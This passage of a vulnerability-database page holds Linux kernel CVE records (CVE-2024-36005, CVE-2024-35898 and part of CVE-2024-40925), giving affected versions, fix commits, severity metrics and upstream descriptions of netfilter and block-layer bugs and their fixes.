Affected: d54725cd11a57c30f650260cfb0a92c268bdc3e0 , < 5c45feb3c288cf44a529e2657b36c259d86497d2 (git)
Affected: d54725cd11a57c30f650260cfb0a92c268bdc3e0 , < 13ba94f6cc820fdea15efeaa17d4c722874eebf9 (git)
Affected: d54725cd11a57c30f650260cfb0a92c268bdc3e0 , < 8260c980aee7d8d8a3db39faf19c391d2f898816 (git)
Affected: d54725cd11a57c30f650260cfb0a92c268bdc3e0 , < ca34c40d1c22c555fa7f4a21a1c807fea7290a0a (git)
Affected: d54725cd11a57c30f650260cfb0a92c268bdc3e0 , < 8e30abc9ace4f0add4cd761dfdbfaebae5632dd2 (git)

Linux

Affected: 5.5
Unaffected: 0 , < 5.5 (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36005",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T17:11:00.848539Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:47:43.082Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:30:12.366Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e4bb6da24de336a7899033a65490ed2d892efa5b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5c45feb3c288cf44a529e2657b36c259d86497d2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/13ba94f6cc820fdea15efeaa17d4c722874eebf9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8260c980aee7d8d8a3db39faf19c391d2f898816"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ca34c40d1c22c555fa7f4a21a1c807fea7290a0a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8e30abc9ace4f0add4cd761dfdbfaebae5632dd2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nft_chain_filter.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e4bb6da24de336a7899033a65490ed2d892efa5b",
              "status": "affected",
              "version": "d54725cd11a57c30f650260cfb0a92c268bdc3e0",
              "versionType": "git"
            },
            {
              "lessThan": "5c45feb3c288cf44a529e2657b36c259d86497d2",
              "status": "affected",
              "version": "d54725cd11a57c30f650260cfb0a92c268bdc3e0",
              "versionType": "git"
            },
            {
              "lessThan": "13ba94f6cc820fdea15efeaa17d4c722874eebf9",
              "status": "affected",
              "version": "d54725cd11a57c30f650260cfb0a92c268bdc3e0",
              "versionType": "git"
            },
            {
              "lessThan": "8260c980aee7d8d8a3db39faf19c391d2f898816",
              "status": "affected",
              "version": "d54725cd11a57c30f650260cfb0a92c268bdc3e0",
              "versionType": "git"
            },
            {
              "lessThan": "ca34c40d1c22c555fa7f4a21a1c807fea7290a0a",
              "status": "affected",
              "version": "d54725cd11a57c30f650260cfb0a92c268bdc3e0",
              "versionType": "git"
            },
            {
              "lessThan": "8e30abc9ace4f0add4cd761dfdbfaebae5632dd2",
              "status": "affected",
              "version": "d54725cd11a57c30f650260cfb0a92c268bdc3e0",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nft_chain_filter.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.5"
            },
            {
              "lessThan": "5.5",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: honor table dormant flag from netdev release event path\n\nCheck for table dormant flag otherwise netdev release event path tries\nto unregister an already unregistered hook.\n\n[524854.857999] ------------[ cut here ]------------\n[524854.858010] WARNING: CPU: 0 PID: 3386599 at net/netfilter/core.c:501 __nf_unregister_net_hook+0x21a/0x260\n[...]\n[524854.858848] CPU: 0 PID: 3386599 Comm: kworker/u32:2 Not tainted 6.9.0-rc3+ #365\n[524854.858869] Workqueue: netns cleanup_net\n[524854.858886] RIP: 0010:__nf_unregister_net_hook+0x21a/0x260\n[524854.858903] Code: 24 e8 aa 73 83 ff 48 63 43 1c 83 f8 01 0f 85 3d ff ff ff e8 98 d1 f0 ff 48 8b 3c 24 e8 8f 73 83 ff 48 63 43 1c e9 26 ff ff ff \u003c0f\u003e 0b 48 83 c4 18 48 c7 c7 00 68 e9 82 5b 5d 41 5c 41 5d 41 5e 41\n[524854.858914] RSP: 0018:ffff8881e36d79e0 EFLAGS: 00010246\n[524854.858926] RAX: 0000000000000000 RBX: ffff8881339ae790 RCX: ffffffff81ba524a\n[524854.858936] RDX: dffffc0000000000 RSI: 0000000000000008 RDI: ffff8881c8a16438\n[524854.858945] RBP: ffff8881c8a16438 R08: 0000000000000001 R09: ffffed103c6daf34\n[524854.858954] R10: ffff8881e36d79a7 R11: 0000000000000000 R12: 0000000000000005\n[524854.858962] R13: ffff8881c8a16000 R14: 0000000000000000 R15: ffff8881351b5a00\n[524854.858971] FS:  0000000000000000(0000) GS:ffff888390800000(0000) knlGS:0000000000000000\n[524854.858982] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[524854.858991] CR2: 00007fc9be0f16f4 CR3: 00000001437cc004 CR4: 00000000001706f0\n[524854.859000] Call Trace:\n[524854.859006]  \u003cTASK\u003e\n[524854.859013]  ? __warn+0x9f/0x1a0\n[524854.859027]  ? __nf_unregister_net_hook+0x21a/0x260\n[524854.859044]  ? report_bug+0x1b1/0x1e0\n[524854.859060]  ? handle_bug+0x3c/0x70\n[524854.859071]  ? exc_invalid_op+0x17/0x40\n[524854.859083]  ? asm_exc_invalid_op+0x1a/0x20\n[524854.859100]  ? __nf_unregister_net_hook+0x6a/0x260\n[524854.859116]  ? __nf_unregister_net_hook+0x21a/0x260\n[524854.859135]  nf_tables_netdev_event+0x337/0x390 [nf_tables]\n[524854.859304]  ? __pfx_nf_tables_netdev_event+0x10/0x10 [nf_tables]\n[524854.859461]  ? packet_notifier+0xb3/0x360\n[524854.859476]  ? _raw_spin_unlock_irqrestore+0x11/0x40\n[524854.859489]  ? dcbnl_netdevice_event+0x35/0x140\n[524854.859507]  ? __pfx_nf_tables_netdev_event+0x10/0x10 [nf_tables]\n[524854.859661]  notifier_call_chain+0x7d/0x140\n[524854.859677]  unregister_netdevice_many_notify+0x5e1/0xae0"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:10:20.855Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e4bb6da24de336a7899033a65490ed2d892efa5b"
        },
        {
          "url": "https://git.kernel.org/stable/c/5c45feb3c288cf44a529e2657b36c259d86497d2"
        },
        {
          "url": "https://git.kernel.org/stable/c/13ba94f6cc820fdea15efeaa17d4c722874eebf9"
        },
        {
          "url": "https://git.kernel.org/stable/c/8260c980aee7d8d8a3db39faf19c391d2f898816"
        },
        {
          "url": "https://git.kernel.org/stable/c/ca34c40d1c22c555fa7f4a21a1c807fea7290a0a"
        },
        {
          "url": "https://git.kernel.org/stable/c/8e30abc9ace4f0add4cd761dfdbfaebae5632dd2"
        }
      ],
      "title": "netfilter: nf_tables: honor table dormant flag from netdev release event path",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36005",
    "datePublished": "2024-05-20T09:48:05.568Z",
    "dateReserved": "2024-05-17T13:50:33.150Z",
    "dateUpdated": "2025-05-04T09:10:20.855Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35898 (GCVE-0-2024-35898)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:34 – Updated: 2025-05-04 09:07

Title

netfilter: nf_tables: Fix potential data-race in __nft_flowtable_type_get()

Summary

In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: Fix potential data-race in __nft_flowtable_type_get() nft_unregister_flowtable_type() within nf_flow_inet_module_exit() can concurrent with __nft_flowtable_type_get() within nf_tables_newflowtable(). And thhere is not any protection when iterate over nf_tables_flowtables list in __nft_flowtable_type_get(). Therefore, there is pertential data-race of nf_tables_flowtables list entry. Use list_for_each_entry_rcu() to iterate over nf_tables_flowtables list in __nft_flowtable_type_get(), and use rcu_read_lock() in the caller nft_flowtable_type_get() to protect the entire type query process.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/69d1fe14a680042ec…
	https://git.kernel.org/stable/c/a347bc8e6251eaee4…
	https://git.kernel.org/stable/c/940d41caa71f0d3a5…
	https://git.kernel.org/stable/c/2485bcfe05ee3cf9c…
	https://git.kernel.org/stable/c/9b5b7708ec2be21dd…
	https://git.kernel.org/stable/c/8b891153b2e4dc0ca…
	https://git.kernel.org/stable/c/e684b1674fd1ca436…
	https://git.kernel.org/stable/c/24225011d81b471ac…

Impacted products

Vendor

Product

Version

Linux

Affected: 3b49e2e94e6ebb8b23d0955d9e898254455734f8 , < 69d1fe14a680042ec913f22196b58e2c8ff1b007 (git)
Affected: 3b49e2e94e6ebb8b23d0955d9e898254455734f8 , < a347bc8e6251eaee4b619da28020641eb5b0dd77 (git)
Affected: 3b49e2e94e6ebb8b23d0955d9e898254455734f8 , < 940d41caa71f0d3a52df2fde5fada524a993e331 (git)
Affected: 3b49e2e94e6ebb8b23d0955d9e898254455734f8 , < 2485bcfe05ee3cf9ca8923a94fa2e456924c79c8 (git)
Affected: 3b49e2e94e6ebb8b23d0955d9e898254455734f8 , < 9b5b7708ec2be21dd7ef8ca0e3abe4ae9f3b083b (git)
Affected: 3b49e2e94e6ebb8b23d0955d9e898254455734f8 , < 8b891153b2e4dc0ca9d9dab8f619d49c740813df (git)
Affected: 3b49e2e94e6ebb8b23d0955d9e898254455734f8 , < e684b1674fd1ca4361812a491242ae871d6b2859 (git)
Affected: 3b49e2e94e6ebb8b23d0955d9e898254455734f8 , < 24225011d81b471acc0e1e315b7d9905459a6304 (git)

Linux

Affected: 4.16
Unaffected: 0 , < 4.16 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.85 , ≤ 6.1.* (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35898",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-29T18:29:13.616197Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-29T19:40:06.574Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.658Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/69d1fe14a680042ec913f22196b58e2c8ff1b007"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a347bc8e6251eaee4b619da28020641eb5b0dd77"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/940d41caa71f0d3a52df2fde5fada524a993e331"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2485bcfe05ee3cf9ca8923a94fa2e456924c79c8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9b5b7708ec2be21dd7ef8ca0e3abe4ae9f3b083b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8b891153b2e4dc0ca9d9dab8f619d49c740813df"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e684b1674fd1ca4361812a491242ae871d6b2859"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/24225011d81b471acc0e1e315b7d9905459a6304"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_tables_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "69d1fe14a680042ec913f22196b58e2c8ff1b007",
              "status": "affected",
              "version": "3b49e2e94e6ebb8b23d0955d9e898254455734f8",
              "versionType": "git"
            },
            {
              "lessThan": "a347bc8e6251eaee4b619da28020641eb5b0dd77",
              "status": "affected",
              "version": "3b49e2e94e6ebb8b23d0955d9e898254455734f8",
              "versionType": "git"
            },
            {
              "lessThan": "940d41caa71f0d3a52df2fde5fada524a993e331",
              "status": "affected",
              "version": "3b49e2e94e6ebb8b23d0955d9e898254455734f8",
              "versionType": "git"
            },
            {
              "lessThan": "2485bcfe05ee3cf9ca8923a94fa2e456924c79c8",
              "status": "affected",
              "version": "3b49e2e94e6ebb8b23d0955d9e898254455734f8",
              "versionType": "git"
            },
            {
              "lessThan": "9b5b7708ec2be21dd7ef8ca0e3abe4ae9f3b083b",
              "status": "affected",
              "version": "3b49e2e94e6ebb8b23d0955d9e898254455734f8",
              "versionType": "git"
            },
            {
              "lessThan": "8b891153b2e4dc0ca9d9dab8f619d49c740813df",
              "status": "affected",
              "version": "3b49e2e94e6ebb8b23d0955d9e898254455734f8",
              "versionType": "git"
            },
            {
              "lessThan": "e684b1674fd1ca4361812a491242ae871d6b2859",
              "status": "affected",
              "version": "3b49e2e94e6ebb8b23d0955d9e898254455734f8",
              "versionType": "git"
            },
            {
              "lessThan": "24225011d81b471acc0e1e315b7d9905459a6304",
              "status": "affected",
              "version": "3b49e2e94e6ebb8b23d0955d9e898254455734f8",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_tables_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.16"
            },
            {
              "lessThan": "4.16",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.85",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.85",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.16",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: Fix potential data-race in __nft_flowtable_type_get()\n\nnft_unregister_flowtable_type() within nf_flow_inet_module_exit() can\nconcurrent with __nft_flowtable_type_get() within nf_tables_newflowtable().\nAnd thhere is not any protection when iterate over nf_tables_flowtables\nlist in __nft_flowtable_type_get(). Therefore, there is pertential\ndata-race of nf_tables_flowtables list entry.\n\nUse list_for_each_entry_rcu() to iterate over nf_tables_flowtables list\nin __nft_flowtable_type_get(), and use rcu_read_lock() in the caller\nnft_flowtable_type_get() to protect the entire type query process."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:07:54.817Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/69d1fe14a680042ec913f22196b58e2c8ff1b007"
        },
        {
          "url": "https://git.kernel.org/stable/c/a347bc8e6251eaee4b619da28020641eb5b0dd77"
        },
        {
          "url": "https://git.kernel.org/stable/c/940d41caa71f0d3a52df2fde5fada524a993e331"
        },
        {
          "url": "https://git.kernel.org/stable/c/2485bcfe05ee3cf9ca8923a94fa2e456924c79c8"
        },
        {
          "url": "https://git.kernel.org/stable/c/9b5b7708ec2be21dd7ef8ca0e3abe4ae9f3b083b"
        },
        {
          "url": "https://git.kernel.org/stable/c/8b891153b2e4dc0ca9d9dab8f619d49c740813df"
        },
        {
          "url": "https://git.kernel.org/stable/c/e684b1674fd1ca4361812a491242ae871d6b2859"
        },
        {
          "url": "https://git.kernel.org/stable/c/24225011d81b471acc0e1e315b7d9905459a6304"
        }
      ],
      "title": "netfilter: nf_tables: Fix potential data-race in __nft_flowtable_type_get()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35898",
    "datePublished": "2024-05-19T08:34:52.519Z",
    "dateReserved": "2024-05-17T13:50:33.114Z",
    "dateUpdated": "2025-05-04T09:07:54.817Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-40925 (GCVE-0-2024-40925)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:25 – Updated: 2025-05-04 09:17

Title

block: fix request.queuelist usage in flush

Summary

In the Linux kernel, the following vulnerability has been resolved: block: fix request.queuelist usage in flush Friedrich Weber reported a kernel crash problem and bisected to commit 81ada09cc25e ("blk-flush: reuse rq queuelist in flush state machine"). The root cause is that we use "list_move_tail(&rq->queuelist, pending)" in the PREFLUSH/POSTFLUSH sequences. But rq->queuelist.next == xxx since it's popped out from plug->cached_rq in __blk_mq_alloc_requests_batch(). We don't initialize its queuelist just for this first request, although the queuelist of all later popped requests will be initialized. Fix it by changing to use "list_add_tail(&rq->queuelist, pending)" so rq->queuelist doesn't need to be initialized. It should be ok since rq can't be on any list when PREFLUSH or POSTFLUSH, has no move actually. Please note the commit 81ada09cc25e ("blk-flush: reuse rq queuelist in flush state machine") also has another requirement that no drivers would touch rq->queuelist after blk_mq_end_request() since we will reuse it to add rq to the post-flush pending list in POSTFLUSH. If this is not true, we will have to revert that commit IMHO. This updated version adds "list_del_init(&rq->queuelist)" in flush rq callback since the dm layer may submit request of a weird invalid format (REQ_FSEQ_PREFLUSH | REQ_FSEQ_POSTFLUSH), which causes double list_add if without this "list_del_init(&rq->queuelist)". The weird invalid format problem should be fixed in dm layer.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/fe1e395563ccb051e…
	https://git.kernel.org/stable/c/87907bd69721a8506…
	https://git.kernel.org/stable/c/d0321c812d89c5910…

Impacted products

Vendor

Product

Version

Linux

Affected: 81ada09cc25e4bf2de7d2951925fb409338a545d , < fe1e395563ccb051e9dbd8fa99859f5caaad2e71 (git)
Affected: 81ada09cc25e4bf2de7d2951925fb409338a545d , < 87907bd69721a8506618a954d41a1de3040e88aa (git)
Affected: 81ada09cc25e4bf2de7d2951925fb409338a545d , < d0321c812d89c5910d8da8e4b10c891c6b96ff70 (git)

Linux

Affected: 6.6
Unaffected: 0 , < 6.6 (semver)
Unaffected: 6.6.35 , ≤ 6.6.* (semver)
Unaffected: 6.9.6 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:39:56.086Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fe1e395563ccb051e9dbd8fa99859f5caaad2e71"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/87907bd69721a8506618a954d41a1de3040e88aa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d0321c812d89c5910d8da8e4b10c891c6b96ff70"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40925",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:05:17.851843Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:03.370Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "block/blk-flush.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "fe1e395563ccb051e9dbd8fa99859f5caaad2e71",
              "status": "affected",
              "version": "81ada09cc25e4bf2de7d2951925fb409338a545d",
              "versionType": "git"
            },
            {
              "lessThan": "87907bd69721a8506618a954d41a1de3040e88aa",
              "status": "affected",
              "version": "81ada09cc25e4bf2de7d2951925fb409338a545d",
              "versionType": "git"
            },
            {
              "lessThan": "d0321c812d89c5910d8da8e4b10c891c6b96ff70",
              "status": "affected",
              "version": "81ada09cc25e4bf2de7d2951925fb409338a545d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "block/blk-flush.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.6"
            },
            {
              "lessThan": "6.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.35",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
